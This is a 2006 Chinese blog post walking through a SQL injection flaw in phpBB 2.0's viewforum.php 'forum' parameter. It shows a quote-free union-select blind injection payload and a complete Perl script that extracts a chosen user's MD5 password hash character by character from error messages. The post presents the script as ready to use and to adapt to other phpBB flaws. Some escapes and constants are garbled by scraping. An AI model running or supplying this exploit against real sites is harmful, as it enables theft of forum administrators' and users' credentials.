php注入实例


Posted in PHP onOctober 09, 2006

php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的??$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.

PHP 相关文章推荐
上传多个文件的PHP脚本
Nov 26 PHP
基于asp+ajax和数据库驱动的二级联动菜单
May 06 PHP
使用PHP 5.0创建图形的巧妙方法
Oct 12 PHP
提高php运行速度的一些小技巧分享
Jul 03 PHP
php调用c接口无错版介绍
Mar 11 PHP
分享一段php获取linux服务器状态的代码
May 27 PHP
php实现猴子选大王问题算法实例
Apr 20 PHP
浅谈php7的重大新特性
Oct 23 PHP
php常用字符串String函数实例总结【转换,替换,计算,截取,加密】
Dec 07 PHP
详谈PHP面向对象中常用的关键字和魔术方法
Feb 04 PHP
PHP常见字符串操作函数与用法总结
Mar 04 PHP
laravel 数据验证规则详解
Oct 23 PHP
967 个函式
Oct 09 #PHP
如何给phpadmin一个保护
Oct 09 #PHP
Search Engine Friendly的URL设计
Oct 09 #PHP
PHPlet在Windows下的安装
Oct 09 #PHP
一棵php的类树(支持无限分类)
Oct 09 #PHP
基于PHP+MySQL的聊天室设计
Oct 09 #PHP
Win9x/ME下Apache+PHP安装配置
Oct 09 #PHP
You might like
简单的php 验证图片生成函数
2009/05/21 PHP
理解php原理的opcodes(操作码)
2010/10/26 PHP
php简单的留言板与回复功能具体实现
2014/02/19 PHP
PHP实现QQ快速登录的方法
2016/09/28 PHP
CakePHP框架Session设置方法分析
2017/02/23 PHP
php实现微信企业号支付个人的方法详解
2017/07/26 PHP
PHP使用星号替代用户名手机和邮箱的实现代码
2018/02/07 PHP
php中yii框架实例用法
2020/12/22 PHP
Javascript 键盘事件的组合使用实现代码
2012/05/04 Javascript
JavaScript中valueOf函数与toString方法深入理解
2012/12/02 Javascript
js jq 单击和双击区分示例介绍
2013/11/05 Javascript
javascript中apply和call方法的作用及区别说明
2014/02/14 Javascript
javascript中substring()、substr()、slice()的区别
2015/08/30 Javascript
jquery悬浮提示框完整实例
2016/01/13 Javascript
angularjs实现文字上下无缝滚动特效代码
2016/09/04 Javascript
浅谈jQuery操作类数组的工具方法
2016/12/23 Javascript
vue 挂载路由到头部导航的方法
2017/11/13 Javascript
Vue中UI组件库之Vuex与虚拟服务器初识
2019/05/07 Javascript
小程序input数据双向绑定实现方法
2019/10/17 Javascript
如何基于原生javaScript生成带图片的二维码
2019/11/21 Javascript
Python返回真假值(True or False)小技巧
2015/04/10 Python
Python搭建APNS苹果推送通知推送服务的相关模块使用指南
2016/06/02 Python
virtualenv实现多个版本Python共存
2017/08/21 Python
python爬虫自动创建文件夹的功能
2018/08/01 Python
Python3利用print输出带颜色的彩色字体示例代码
2019/04/08 Python
Django搭建项目实战与避坑细节详解
2020/12/06 Python
Vans英国官方网站:美国南加州的原创极限运动潮牌
2017/01/20 全球购物
荷兰皇家航空公司中国官网:KLM中国
2017/12/13 全球购物
硕士研究生就业推荐信
2014/05/18 职场文书
材料物理专业求职信
2014/09/01 职场文书
2014最新房贷收入证明范本
2014/09/12 职场文书
工作失职检讨书
2015/01/26 职场文书
社区文明创建工作总结2015
2015/04/21 职场文书
质量承诺书格式范文
2015/04/28 职场文书
小爸爸观后感
2015/06/15 职场文书
MySQL为数据表建立索引的原则详解
2022/03/03 MySQL